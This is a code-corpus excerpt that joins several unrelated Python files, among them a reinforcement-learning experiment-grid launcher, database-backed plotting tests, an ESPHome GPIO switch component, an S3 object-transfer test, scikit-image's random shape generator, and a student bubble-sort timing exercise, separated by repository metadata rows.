data_dir (string): Used in configuring the logger, to decide where
to store experiment results. Note: if left as None, data_dir will
default to ``DEFAULT_DATA_DIR`` from ``spinup/user_config.py``.
**kwargs: All kwargs to pass to thunk.
"""
# Determine number of CPU cores to run on
num_cpu = psutil.cpu_count(logical=False) if num_cpu=='auto' else num_cpu
# Send random seed to thunk
kwargs['seed'] = seed
# Be friendly and print out your kwargs, so we all know what's up
print(colorize('Running experiment:\n', color='cyan', bold=True))
print(exp_name + '\n')
print(colorize('with kwargs:\n', color='cyan', bold=True))
kwargs_json = convert_json(kwargs)
print(json.dumps(kwargs_json, separators=(',',':\t'), indent=4, sort_keys=True))
print('\n')
# Set up logger output directory
if 'logger_kwargs' not in kwargs:
kwargs['logger_kwargs'] = setup_logger_kwargs(exp_name, seed, data_dir, datestamp)
else:
print('Note: Call experiment is not handling logger_kwargs.\n')
def thunk_plus():
# Make 'env_fn' from 'env_name'
if 'env_name' in kwargs:
import gym
env_name = kwargs['env_name']
kwargs['env_fn'] = lambda : gym.make(env_name)
del kwargs['env_name']
# Fork into multiple processes
mpi_fork(num_cpu)
# Run thunk
thunk(**kwargs)
# Prepare to launch a script to run the experiment
pickled_thunk = cloudpickle.dumps(thunk_plus)
encoded_thunk = base64.b64encode(zlib.compress(pickled_thunk)).decode('utf-8')
entrypoint = osp.join(osp.abspath(osp.dirname(__file__)), 'run_entrypoint.py')
cmd = [sys.executable if sys.executable else 'python', entrypoint, encoded_thunk]
try:
subprocess.check_call(cmd, env=os.environ)
except CalledProcessError:
err_msg = '\n'*3 + '='*DIV_LINE_WIDTH + '\n' + dedent("""
There appears to have been an error in your experiment.
Check the traceback above to see what actually went wrong. The
traceback below, included for completeness (but probably not useful
for diagnosing the error), shows the stack leading up to the
experiment launch.
""") + '='*DIV_LINE_WIDTH + '\n'*3
print(err_msg)
raise
# Tell the user about where results are, and how to check them
logger_kwargs = kwargs['logger_kwargs']
plot_cmd = 'python -m spinup.run plot '+logger_kwargs['output_dir']
plot_cmd = colorize(plot_cmd, 'green')
test_cmd = 'python -m spinup.run test_policy '+logger_kwargs['output_dir']
test_cmd = colorize(test_cmd, 'green')
output_msg = '\n'*5 + '='*DIV_LINE_WIDTH +'\n' + dedent("""\
End of experiment.
Plot results from this run with:
%s
Watch the trained agent with:
%s
"""%(plot_cmd,test_cmd)) + '='*DIV_LINE_WIDTH + '\n'*5
print(output_msg)
def all_bools(vals):
return all([isinstance(v,bool) for v in vals])
def valid_str(v):
"""
Convert a value or values to a string which could go in a filepath.
Partly based on `this gist`_.
.. _`this gist`: https://gist.github.com/seanh/93666
"""
if hasattr(v, '__name__'):
return valid_str(v.__name__)
if isinstance(v, tuple) or isinstance(v, list):
return '-'.join([valid_str(x) for x in v])
# Valid characters are '-', '_', and alphanumeric. Replace invalid chars
# with '-'.
str_v = str(v).lower()
valid_chars = "-_%s%s" % (string.ascii_letters, string.digits)
str_v = ''.join(c if c in valid_chars else '-' for c in str_v)
return str_v
class ExperimentGrid:
"""
Tool for running many experiments given hyperparameter ranges.
"""
def __init__(self, name=''):
self.keys = []
self.vals = []
self.shs = []
self.in_names = []
self.name(name)
def name(self, _name):
assert isinstance(_name, str), "Name has to be a string."
self._name = _name
def print(self):
"""Print a helpful report about the experiment grid."""
print('='*DIV_LINE_WIDTH)
# Prepare announcement at top of printing. If the ExperimentGrid has a
# short name, write this as one line. If the name is long, break the
# announcement over two lines.
base_msg = 'ExperimentGrid %s runs over parameters:\n'
name_insert = '['+self._name+']'
if len(base_msg%name_insert) <= 80:
msg = base_msg%name_insert
else:
msg = base_msg%(name_insert+'\n')
print(colorize(msg, color='green', bold=True))
# List off parameters, shorthands, and possible values.
for k, v, sh in zip(self.keys, self.vals, self.shs):
color_k = colorize(k.ljust(40), color='cyan', bold=True)
print('', color_k, '['+sh+']' if sh is not None else '', '\n')
for i, val in enumerate(v):
print('\t' + str(convert_json(val)))
print()
# Count up the number of variants. The number counting seeds
# is the total number of experiments that will run; the number not
# counting seeds is the total number of otherwise-unique configs
# being investigated.
nvars_total = int(np.prod([len(v) for v in self.vals]))
if 'seed' in self.keys:
num_seeds = len(self.vals[self.keys.index('seed')])
nvars_seedless = int(nvars_total / num_seeds)
else:
nvars_seedless = nvars_total
print(' Variants, counting seeds: '.ljust(40), nvars_total)
print(' Variants, not counting seeds: '.ljust(40), nvars_seedless)
print()
print('='*DIV_LINE_WIDTH)
def _default_shorthand(self, key):
# Create a default shorthand for the key, built from the first
# three letters of each colon-separated part.
# But if the first three letters contains something which isn't
# alphanumeric, shear that off.
valid_chars = "%s%s" % (string.ascii_letters, string.digits)
def shear(x):
return ''.join(z for z in x[:3] if z in valid_chars)
sh = '-'.join([shear(x) for x in key.split(':')])
return sh
def add(self, key, vals, shorthand=None, in_name=False):
"""
Add a parameter (key) to the grid config, with potential values (vals).
By default, if a shorthand isn't given, one is automatically generated
from the key using the first three letters of each colon-separated
term. To disable this behavior, change ``DEFAULT_SHORTHAND`` in the
``spinup/user_config.py`` file to ``False``.
Args:
key (string): Name of parameter.
vals (value or list of values): Allowed values of parameter.
shorthand (string): Optional, shortened name of parameter. For
example, maybe the parameter ``steps_per_epoch`` is shortened
to ``steps``.
in_name (bool): When constructing variant names, force the
inclusion of this parameter into the name.
"""
assert isinstance(key, str), "Key must be a string."
assert shorthand is None or isinstance(shorthand, str), \
"Shorthand must be a string."
if not isinstance(vals, list):
vals = [vals]
if DEFAULT_SHORTHAND and shorthand is None:
shorthand = self._default_shorthand(key)
self.keys.append(key)
self.vals.append(vals)
self.shs.append(shorthand)
self.in_names.append(in_name)
def variant_name(self, variant):
"""
Given a variant (dict of valid param/value pairs), make an exp_name.
A variant's name is constructed as the grid name (if you've given it
one), plus param names (or shorthands if available) and values
separated by underscores.
Note: if ``seed`` is a parameter, it is not included in the name.
"""
def get_val(v, k):
# Utility method for getting the correct value out of a variant
# given as a nested dict. Assumes that a parameter name, k,
# describes a path into the nested dict, such that k='a:b:c'
# corresponds to value=variant['a']['b']['c']. Uses recursion
# to get this.
if k in v:
return v[k]
else:
splits = k.split(':')
k0, k1 = splits[0], ':'.join(splits[1:])
return get_val(v[k0], k1)
# Start the name off with the name of the variant generator.
var_name = self._name
# Build the rest of the name by looping through all parameters,
# and deciding which ones need to go in there.
for k, v, sh, inn in zip(self.keys, self.vals, self.shs, self.in_names):
# Include a parameter in a name if either 1) it can take multiple
# values, or 2) the user specified that it must appear in the name.
# Except, however, when the parameter is 'seed'. Seed is handled
# differently so that runs of the same experiment, with different
# seeds, will be grouped by experiment name.
if (len(v)>1 or inn) and not(k=='seed'):
# Use the shorthand if available, otherwise the full name.
param_name = sh if sh is not None else k
param_name = valid_str(param_name)
# Get variant value for parameter k
variant_val = get_val(variant, k)
# Append to name
if all_bools(v):
# If this is a param which only takes boolean values,
# only include in the name if it's True for this variant.
var_name += ('_' + param_name) if variant_val else ''
else:
var_name += '_' + param_name + valid_str(variant_val)
return var_name.lstrip('_')
def _variants(self, keys, vals):
"""
Recursively builds list of valid variants.
"""
if len(keys)==1:
pre_variants = [dict()]
else:
pre_variants = self._variants(keys[1:], vals[1:])
variants = []
for val in vals[0]:
for pre_v in pre_variants:
v = {}
v[keys[0]] = val
v.update(pre_v)
variants.append(v)
return variants
def variants(self):
"""
Makes a list of dicts, where each dict is a valid config in the grid.
There is special handling for variant parameters whose names take
the form
``'full:param:name'``.
The colons are taken to indicate that these parameters should
have a nested dict structure. eg, if there are two params,
==================== ===
Key Val
==================== ===
``'base:param:one'`` 1
``'base:param:two'`` 2
==================== ===
the variant dict will have the structure
.. parsed-literal::
variant = {
base: {
param : {
a : 1,
b : 2
}
}
}
"""
flat_variants = self._variants(self.keys, self.vals)
def unflatten_var(var):
"""
Build the full nested dict version of var, based on key names.
"""
new_var = dict()
unflatten_set = set()
for k,v in var.items():
if ':' in k:
splits = k.split(':')
k0 = splits[0]
assert k0 not in new_var or isinstance(new_var[k0], dict), \
"You can't assign multiple values to the same key."
if not(k0 in new_var):
new_var[k0] = dict()
sub_k = ':'.join(splits[1:])
new_var[k0][sub_k] = v
unflatten_set.add(k0)
else:
assert not(k in new_var), \
"You can't assign multiple values to the same key."
new_var[k] = v
# Make sure to fill out the nested dicts.
for k in unflatten_set:
new_var[k] = unflatten_var(new_var[k])
return new_var
new_variants = [unflatten_var(var) for var in flat_variants]
return new_variants
def run(self, thunk, num_cpu=1, data_dir=None, datestamp=False):
"""
Run each variant in the grid with function 'thunk'.
Note: 'thunk' must be either a callable function, or a string. If it is
a string, it must be the name of a parameter whose values are all
callable functions.
Uses ``call_experiment`` to actually launch each experiment, and gives
each variant a name using ``self.variant_name()``.
Maintenance note: the args for ExperimentGrid.run should track closely
to the args for call_experiment. However, ``seed`` is omitted because
we presume the user may add it as a parameter in the grid.
"""
# Print info about self.
self.print()
# Make the list of all variants.
variants = self.variants()
# Print variant names for the user.
var_names = set([self.variant_name(var) for var in variants])
var_names = sorted(list(var_names))
line = '='*DIV_LINE_WIDTH
preparing = colorize('Preparing to run the following experiments...',
color='green', bold=True)
joined_var_names = '\n'.join(var_names)
announcement = f"\n{preparing}\n\n{joined_var_names}\n\n{line}"
print(announcement)
if WAIT_BEFORE_LAUNCH > 0:
delay_msg = colorize(dedent("""
Launch delayed to give you a few seconds to review your experiments.
To customize or disable this behavior, change WAIT_BEFORE_LAUNCH in
spinup/user_config.py.
"""), color='cyan', bold=True)+line
print(delay_msg)
wait, steps = WAIT_BEFORE_LAUNCH, 100
prog_bar = trange(steps, desc='Launching in...',
leave=False, ncols=DIV_LINE_WIDTH,
mininterval=0.25,
bar_format='{desc}: {bar}| {remaining} {elapsed}')
for _ in prog_bar:
time.sleep(wait/steps)
# Run the variants.
for var in variants:
exp_name = self.variant_name(var)
# Figure out what the thunk is.
if isinstance(thunk, str):
# Assume one of the variant parameters has the same
# name as the string you passed for thunk, and that
# variant[thunk] is a valid callable function.
thunk_ = var[thunk]
del var[thunk]
else:
# Assume thunk is given as a function.
thunk_ = thunk
call_experiment(exp_name, thunk_, num_cpu=num_cpu,
data_dir=data_dir, datestamp=datestamp, **var)
def test_eg():
eg = ExperimentGrid()
eg.add('test:a', [1,2,3], 'ta', True)
eg.add('test:b', [1,2,3])
eg.add('some', [4,5])
eg.add('why', [True,False])
eg.add('huh', 5)
eg.add('no', 6, in_name=True)
return eg.variants()
| 35.38172
| 90
| 0.591906
|
55061520fa145c1d78ea8a4de832e39c43a273fc
| 1,956
|
py
|
Python
|
src/tests/audition_tests/test_model_group_performance.py
|
josephbajor/triage_NN
|
cbaee6e5a06e597c91fec372717d89a2b5f34fa5
|
[
"MIT"
] | 160
|
2017-06-13T09:59:59.000Z
|
2022-03-21T22:00:35.000Z
|
src/tests/audition_tests/test_model_group_performance.py
|
josephbajor/triage_NN
|
cbaee6e5a06e597c91fec372717d89a2b5f34fa5
|
[
"MIT"
] | 803
|
2016-10-21T19:44:02.000Z
|
2022-03-29T00:02:33.000Z
|
src/tests/audition_tests/test_model_group_performance.py
|
josephbajor/triage_NN
|
cbaee6e5a06e597c91fec372717d89a2b5f34fa5
|
[
"MIT"
] | 59
|
2017-01-31T22:10:22.000Z
|
2022-03-19T12:35:03.000Z
|
from unittest.mock import patch
import numpy as np
import testing.postgresql
from sqlalchemy import create_engine
from triage.component.audition.model_group_performance import (
ModelGroupPerformancePlotter,
)
from .utils import create_sample_distance_table
def test_ModelGroupPerformancePlotter_generate_plot_data():
with testing.postgresql.Postgresql() as postgresql:
engine = create_engine(postgresql.url())
distance_table, model_groups = create_sample_distance_table(engine)
plotter = ModelGroupPerformancePlotter(distance_table)
df = plotter.generate_plot_data(
metric="precision@",
parameter="100_abs",
model_group_ids=[1, 2],
train_end_times=["2014-01-01", "2015-01-01"],
)
assert sorted(df["model_type"].unique()) == [
"best case",
"mySpikeClassifier",
"myStableClassifier",
]
for value in df[df["model_group_id"] == 1]["raw_value"].values:
assert np.isclose(value, 0.5)
def test_ModelGroupPerformancePlotter_plot_all():
with patch(
"triage.component.audition.model_group_performance.plot_cats"
) as plot_patch:
with testing.postgresql.Postgresql() as postgresql:
engine = create_engine(postgresql.url())
distance_table, model_groups = create_sample_distance_table(engine)
plotter = ModelGroupPerformancePlotter(distance_table)
plotter.plot_all(
[{"metric": "precision@", "parameter": "100_abs"}],
model_group_ids=[1, 2],
train_end_times=["2014-01-01", "2015-01-01"],
)
assert plot_patch.called
args, kwargs = plot_patch.call_args
assert "raw_value" in kwargs["frame"]
assert "train_end_time" in kwargs["frame"]
assert kwargs["x_col"] == "train_end_time"
assert kwargs["y_col"] == "raw_value"
| 36.90566
| 79
| 0.652863
|
58700c67e9ae604119edd594ee45b591c98cca0c
| 850
|
py
|
Python
|
esphomeyaml/components/switch/gpio.py
|
johnerikhalse/esphomeyaml
|
490743c26e3226f95181d00ded522b3f41372cb4
|
[
"MIT"
] | 1
|
2021-01-14T13:43:37.000Z
|
2021-01-14T13:43:37.000Z
|
esphomeyaml/components/switch/gpio.py
|
lobradov/esphomeyaml
|
27a77c685d30c1f113469d26d929d4ce9f1ed720
|
[
"MIT"
] | null | null | null |
esphomeyaml/components/switch/gpio.py
|
lobradov/esphomeyaml
|
27a77c685d30c1f113469d26d929d4ce9f1ed720
|
[
"MIT"
] | null | null | null |
import voluptuous as vol
import esphomeyaml.config_validation as cv
from esphomeyaml import pins
from esphomeyaml.components import switch
from esphomeyaml.const import CONF_MAKE_ID, CONF_NAME, CONF_PIN
from esphomeyaml.helpers import App, Application, gpio_output_pin_expression, variable
MakeGPIOSwitch = Application.MakeGPIOSwitch
PLATFORM_SCHEMA = cv.nameable(switch.SWITCH_PLATFORM_SCHEMA.extend({
cv.GenerateID(CONF_MAKE_ID): cv.declare_variable_id(MakeGPIOSwitch),
vol.Required(CONF_PIN): pins.gpio_output_pin_schema,
}))
def to_code(config):
pin = None
for pin in gpio_output_pin_expression(config[CONF_PIN]):
yield
rhs = App.make_gpio_switch(config[CONF_NAME], pin)
gpio = variable(config[CONF_MAKE_ID], rhs)
switch.setup_switch(gpio.Pswitch_, gpio.Pmqtt, config)
BUILD_FLAGS = '-DUSE_GPIO_SWITCH'
| 31.481481
| 86
| 0.794118
|
5aa87a7525d449eed0e505215ef36da477449b6b
| 2,595
|
py
|
Python
|
s3/replication/common/tests/system/s3_async_transfer_object.py
|
hessio/cortx-multisite
|
544cdef1a4cf08e97ca0757fcd9a32fbbc7b1997
|
[
"Apache-2.0"
] | 1
|
2022-01-13T12:26:30.000Z
|
2022-01-13T12:26:30.000Z
|
s3/replication/common/tests/system/s3_async_transfer_object.py
|
hessio/cortx-multisite
|
544cdef1a4cf08e97ca0757fcd9a32fbbc7b1997
|
[
"Apache-2.0"
] | null | null | null |
s3/replication/common/tests/system/s3_async_transfer_object.py
|
hessio/cortx-multisite
|
544cdef1a4cf08e97ca0757fcd9a32fbbc7b1997
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
#
# Copyright (c) 2021 Seagate Technology LLC and/or its Affiliates
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For any questions about this software or licensing,
# please email opensource@seagate.com or cortx-questions@seagate.com.
#
import asyncio
from config import Config
import os
import sys
from s3replicationcommon.log import setup_logger
from s3replicationcommon.s3_site import S3Site
from s3replicationcommon.s3_session import S3Session
from s3replicationcommon.s3_get_object import S3AsyncGetObject
from s3replicationcommon.s3_put_object import S3AsyncPutObject
async def main():
config = Config()
# Setup logging and get logger
log_config_file = os.path.join(os.path.dirname(__file__),
'config', 'logger_config.yaml')
print("Using log config {}".format(log_config_file))
logger = setup_logger('client_tests', log_config_file)
if logger is None:
print("Failed to configure logging.\n")
sys.exit(-1)
s3_site = S3Site(config.endpoint, config.s3_service_name, config.s3_region)
session = S3Session(logger, s3_site, config.access_key, config.secret_key)
# Generate object names
source_object_name = config.object_name_prefix + "test"
target_object_name = config.object_name_prefix + "copy"
request_id = "dummy-request-id"
object_reader = S3AsyncGetObject(session, request_id,
config.source_bucket_name,
source_object_name, config.object_size,
config.range_read_offset, config.range_read_length)
object_writer = S3AsyncPutObject(session, request_id,
config.target_bucket_name,
target_object_name, config.object_size)
# Start transfer
await object_writer.send(object_reader, config.transfer_chunk_size)
logger.info("S3AsyncTransferObject test passed!")
await session.close()
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
| 35.547945
| 88
| 0.7079
|
4e09886166af9089fff66a97ff1df96ee08e6a93
| 539
|
py
|
Python
|
aslprep/pybids/__init__.py
|
krmurtha/aslprep
|
5c00c2c9ad1daf93b056907596b7798ae8059efb
|
[
"BSD-3-Clause"
] | 2
|
2022-03-18T18:31:12.000Z
|
2022-03-18T18:31:26.000Z
|
aslprep/pybids/__init__.py
|
krmurtha/aslprep
|
5c00c2c9ad1daf93b056907596b7798ae8059efb
|
[
"BSD-3-Clause"
] | null | null | null |
aslprep/pybids/__init__.py
|
krmurtha/aslprep
|
5c00c2c9ad1daf93b056907596b7798ae8059efb
|
[
"BSD-3-Clause"
] | 1
|
2020-04-13T20:04:21.000Z
|
2020-04-13T20:04:21.000Z
|
from .due import due, Doi
from .layout import BIDSLayout
# For backwards compatibility
from bids_validator import BIDSValidator
__all__ = [
"analysis",
"BIDSLayout",
"BIDSValidator",
"config",
"layout",
"reports",
"utils",
"variables"
]
due.cite(Doi("10.1038/sdata.2016.44"),
description="Brain Imaging Data Structure",
tags=["reference-implementation"],
path='bids')
del due, Doi
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
| 17.966667
| 52
| 0.667904
|
ed2a36bce2a8202fda36f38cf1377e92e915378f
| 13,071
|
py
|
Python
|
skimage/draw/_random_shapes.py
|
thewtex/scikit-image
|
22bb6b94698b8889cbdf26b25d9e4fdb8b968d97
|
[
"BSD-3-Clause"
] | 1
|
2019-01-12T13:17:32.000Z
|
2019-01-12T13:17:32.000Z
|
skimage/draw/_random_shapes.py
|
thewtex/scikit-image
|
22bb6b94698b8889cbdf26b25d9e4fdb8b968d97
|
[
"BSD-3-Clause"
] | 30
|
2020-04-15T19:37:40.000Z
|
2020-04-22T21:19:35.000Z
|
skimage/draw/_random_shapes.py
|
thewtex/scikit-image
|
22bb6b94698b8889cbdf26b25d9e4fdb8b968d97
|
[
"BSD-3-Clause"
] | 2
|
2020-03-12T23:20:22.000Z
|
2021-02-15T21:54:02.000Z
|
import numpy as np
from . import polygon as draw_polygon, circle as draw_circle
from .._shared.utils import warn
def _generate_rectangle_mask(point, image, shape, random):
"""Generate a mask for a filled rectangle shape.
The height and width of the rectangle are generated randomly.
Parameters
----------
point : tuple
The row and column of the top left corner of the rectangle.
image : tuple
The height, width and depth of the image into which the shape is placed.
shape : tuple
The minimum and maximum size of the shape to fit.
random : np.random.RandomState
The random state to use for random sampling.
Raises
------
ArithmeticError
When a shape cannot be fit into the image with the given starting
coordinates. This usually means the image dimensions are too small or
shape dimensions too large.
Returns
-------
label : tuple
A (category, ((r0, r1), (c0, c1))) tuple specifying the category and
bounding box coordinates of the shape.
indices : 2-D array
A mask of indices that the shape fills.
"""
available_width = min(image[1] - point[1], shape[1])
if available_width < shape[0]:
raise ArithmeticError('cannot fit shape to image')
available_height = min(image[0] - point[0], shape[1])
if available_height < shape[0]:
raise ArithmeticError('cannot fit shape to image')
# Pick random widths and heights.
r = random.randint(shape[0], available_height + 1)
c = random.randint(shape[0], available_width + 1)
rectangle = draw_polygon([
point[0],
point[0] + r,
point[0] + r,
point[0],
], [
point[1],
point[1],
point[1] + c,
point[1] + c,
])
label = ('rectangle', ((point[0], point[0] + r), (point[1], point[1] + c)))
return rectangle, label
def _generate_circle_mask(point, image, shape, random):
"""Generate a mask for a filled circle shape.
The radius of the circle is generated randomly.
Parameters
----------
point : tuple
The row and column of the top left corner of the rectangle.
image : tuple
The height, width and depth of the image into which the shape is placed.
shape : tuple
The minimum and maximum size and color of the shape to fit.
random : np.random.RandomState
The random state to use for random sampling.
Raises
------
ArithmeticError
When a shape cannot be fit into the image with the given starting
coordinates. This usually means the image dimensions are too small or
shape dimensions too large.
Returns
-------
label : tuple
A (category, ((r0, r1), (c0, c1))) tuple specifying the category and
bounding box coordinates of the shape.
indices : 2-D array
A mask of indices that the shape fills.
"""
if shape[0] == 1 or shape[1] == 1:
raise ValueError('size must be > 1 for circles')
min_radius = shape[0] / 2.0
max_radius = shape[1] / 2.0
left = point[1]
right = image[1] - point[1]
top = point[0]
bottom = image[0] - point[0]
available_radius = min(left, right, top, bottom, max_radius)
if available_radius < min_radius:
raise ArithmeticError('cannot fit shape to image')
radius = random.randint(min_radius, available_radius + 1)
circle = draw_circle(point[0], point[1], radius)
label = ('circle', ((point[0] - radius + 1, point[0] + radius),
(point[1] - radius + 1, point[1] + radius)))
return circle, label
def _generate_triangle_mask(point, image, shape, random):
"""Generate a mask for a filled equilateral triangle shape.
The length of the sides of the triangle is generated randomly.
Parameters
----------
point : tuple
The row and column of the top left corner of a down-pointing triangle.
image : tuple
The height, width and depth of the image into which the shape is placed.
shape : tuple
The minimum and maximum size and color of the shape to fit.
random : np.random.RandomState
The random state to use for random sampling.
Raises
------
ArithmeticError
When a shape cannot be fit into the image with the given starting
coordinates. This usually means the image dimensions are too small or
shape dimensions too large.
Returns
-------
label : tuple
A (category, ((r0, r1), (c0, c1))) tuple specifying the category and
bounding box coordinates of the shape.
indices : 2-D array
A mask of indices that the shape fills.
"""
if shape[0] == 1 or shape[1] == 1:
raise ValueError('dimension must be > 1 for triangles')
available_side = min(image[1] - point[1], point[0] + 1, shape[1])
if available_side < shape[0]:
raise ArithmeticError('cannot fit shape to image')
side = random.randint(shape[0], available_side + 1)
triangle_height = int(np.ceil(np.sqrt(3 / 4.0) * side))
triangle = draw_polygon([
point[0],
point[0] - triangle_height,
point[0],
], [
point[1],
point[1] + side // 2,
point[1] + side,
])
label = ('triangle', ((point[0] - triangle_height, point[0]),
(point[1], point[1] + side)))
return triangle, label
# Allows lookup by key as well as random selection.
SHAPE_GENERATORS = dict(
rectangle=_generate_rectangle_mask,
circle=_generate_circle_mask,
triangle=_generate_triangle_mask)
SHAPE_CHOICES = list(SHAPE_GENERATORS.values())
def _generate_random_colors(num_colors, num_channels, intensity_range, random):
"""Generate an array of random colors.
Parameters
----------
num_colors : int
Number of colors to generate.
num_channels : int
Number of elements representing color.
intensity_range : {tuple of tuples of ints, tuple of ints}, optional
The range of values to sample pixel values from. For grayscale images
the format is (min, max). For multichannel - ((min, max),) if the
ranges are equal across the channels, and
((min_0, max_0), ... (min_N, max_N)) if they differ.
random : np.random.RandomState
The random state to use for random sampling.
Raises
------
ValueError
When the `intensity_range` is not in the interval (0, 255).
Returns
-------
colors : array
An array of shape (num_colors, num_channels), where the values for
each channel are drawn from the corresponding `intensity_range`.
"""
if num_channels == 1:
intensity_range = (intensity_range, )
elif len(intensity_range) == 1:
intensity_range = intensity_range * num_channels
colors = [random.randint(r[0], r[1]+1, size=num_colors)
for r in intensity_range]
return np.transpose(colors)
def random_shapes(image_shape,
max_shapes,
min_shapes=1,
min_size=2,
max_size=None,
multichannel=True,
num_channels=3,
shape=None,
intensity_range=None,
allow_overlap=False,
num_trials=100,
random_seed=None):
"""Generate an image with random shapes, labeled with bounding boxes.
The image is populated with random shapes with random sizes, random
locations, and random colors, with or without overlap.
Shapes have random (row, col) starting coordinates and random sizes bounded
by `min_size` and `max_size`. It can occur that a randomly generated shape
will not fit the image at all. In that case, the algorithm will try again
with new starting coordinates a certain number of times. However, it also
means that some shapes may be skipped altogether. In that case, this
function will generate fewer shapes than requested.
Parameters
----------
image_shape : tuple
The number of rows and columns of the image to generate.
max_shapes : int
The maximum number of shapes to (attempt to) fit into the shape.
min_shapes : int, optional
The minimum number of shapes to (attempt to) fit into the shape.
min_size : int, optional
The minimum dimension of each shape to fit into the image.
max_size : int, optional
The maximum dimension of each shape to fit into the image.
multichannel : bool, optional
If True, the generated image has ``num_channels`` color channels,
otherwise generates grayscale image.
num_channels : int, optional
Number of channels in the generated image. If 1, generate monochrome
images, else color images with multiple channels. Ignored if
``multichannel`` is set to False.
shape : {rectangle, circle, triangle, None} str, optional
The name of the shape to generate or `None` to pick random ones.
intensity_range : {tuple of tuples of uint8, tuple of uint8}, optional
The range of values to sample pixel values from. For grayscale images
the format is (min, max). For multichannel - ((min, max),) if the
ranges are equal across the channels, and ((min_0, max_0), ... (min_N, max_N))
if they differ. As the function supports generation of uint8 arrays only,
the maximum range is (0, 255). If None, set to (0, 254) for each
channel reserving color of intensity = 255 for background.
allow_overlap : bool, optional
If `True`, allow shapes to overlap.
num_trials : int, optional
How often to attempt to fit a shape into the image before skipping it.
seed : int, optional
Seed to initialize the random number generator.
If `None`, a random seed from the operating system is used.
Returns
-------
image : uint8 array
An image with the fitted shapes.
labels : list
A list of labels, one per shape in the image. Each label is a
(category, ((r0, r1), (c0, c1))) tuple specifying the category and
bounding box coordinates of the shape.
Examples
--------
>>> import skimage.draw
>>> image, labels = skimage.draw.random_shapes((32, 32), max_shapes=3)
>>> image # doctest: +SKIP
array([
[[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
...,
[255, 255, 255],
[255, 255, 255],
[255, 255, 255]]], dtype=uint8)
>>> labels # doctest: +SKIP
[('circle', ((22, 18), (25, 21))),
('triangle', ((5, 6), (13, 13)))]
"""
if min_size > image_shape[0] or min_size > image_shape[1]:
raise ValueError('Minimum dimension must be less than ncols and nrows')
max_size = max_size or max(image_shape[0], image_shape[1])
if not multichannel:
num_channels = 1
if intensity_range is None:
intensity_range = (0, 254) if num_channels == 1 else ((0, 254), )
else:
tmp = (intensity_range, ) if num_channels == 1 else intensity_range
for intensity_pair in tmp:
for intensity in intensity_pair:
if not (0 <= intensity <= 255):
msg = 'Intensity range must lie within (0, 255) interval'
raise ValueError(msg)
random = np.random.RandomState(random_seed)
user_shape = shape
image_shape = (image_shape[0], image_shape[1], num_channels)
image = np.ones(image_shape, dtype=np.uint8) * 255
filled = np.zeros(image_shape, dtype=bool)
labels = []
num_shapes = random.randint(min_shapes, max_shapes + 1)
colors = _generate_random_colors(num_shapes, num_channels,
intensity_range, random)
for shape_idx in range(num_shapes):
if user_shape is None:
shape_generator = random.choice(SHAPE_CHOICES)
else:
shape_generator = SHAPE_GENERATORS[user_shape]
shape = (min_size, max_size)
for _ in range(num_trials):
# Pick start coordinates.
column = random.randint(image_shape[1])
row = random.randint(image_shape[0])
point = (row, column)
try:
indices, label = shape_generator(point, image_shape, shape,
random)
except ArithmeticError:
# Couldn't fit the shape, skip it.
continue
# Check if there is an overlap where the mask is nonzero.
if allow_overlap or not filled[indices].any():
image[indices] = colors[shape_idx]
filled[indices] = True
labels.append(label)
break
else:
warn('Could not fit any shapes to image, '
'consider reducing the minimum dimension')
if not multichannel:
image = np.squeeze(image, axis=2)
return image, labels
| 36.819718
| 86
| 0.620764
|
e103d4313ed170e05b2038c665a4e481787eb33e
| 951
|
py
|
Python
|
S1/TP6/ex1.py
|
HerbeMalveillante/ecole
|
bebbc73cd678c58c9cd40389ea1cf229a0200308
|
[
"MIT"
] | null | null | null |
S1/TP6/ex1.py
|
HerbeMalveillante/ecole
|
bebbc73cd678c58c9cd40389ea1cf229a0200308
|
[
"MIT"
] | null | null | null |
S1/TP6/ex1.py
|
HerbeMalveillante/ecole
|
bebbc73cd678c58c9cd40389ea1cf229a0200308
|
[
"MIT"
] | null | null | null |
from time import time
from random import randint
def comp():
for m in range(5, 25):
debut = time()
print(sum([n ** 2 for n in range(2 ** m)]))
print(m, ":", time() - debut)
# le code est de plus en plus long à s'éxecuter à mesure que
# m augmente.
def tri_bulle(liste_entree):
liste = liste_entree[:]
n = len(liste)
for j in range(1, n):
for i in range(n - j):
if liste[i] > liste[i + 1]:
liste[i], liste[i + 1] = liste[i + 1], liste[i]
return liste
def compare_tris():
for m in range(5, 25):
debut = time()
liste = [randint(0, 1000) for i in range(2 ** m)]
sorted(liste)
print(m, " (tri python) :", time() - debut)
debut = time()
tri_bulle(liste)
print(m, " (tri bulle) : ", time() - debut)
compare_tris()
# on constate que la fonction de python est de loin plus rapide
# que le tri à bulle.
| 23.775
| 64
| 0.542587
|
efefe625607ceaa7ad5f7cefe124bff7f588b9e0
| 2,022
|
py
|
Python
|
repoxplorer/tests/test_yamlbackend.py
|
morucci2/repoxplorer
|
640455bfa22cc344146644d4e0d72cb6c1e7ba48
|
[
"Apache-2.0"
] | null | null | null |
repoxplorer/tests/test_yamlbackend.py
|
morucci2/repoxplorer
|
640455bfa22cc344146644d4e0d72cb6c1e7ba48
|
[
"Apache-2.0"
] | null | null | null |
repoxplorer/tests/test_yamlbackend.py
|
morucci2/repoxplorer
|
640455bfa22cc344146644d4e0d72cb6c1e7ba48
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017, Red Hat
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shutil
import tempfile
from unittest import TestCase
from repoxplorer.index.yamlbackend import YAMLBackend
class TestYAMLBackend(TestCase):
def setUp(self):
pass
def tearDown(self):
if os.path.isdir(self.db):
shutil.rmtree(self.db)
def create_db(self, files):
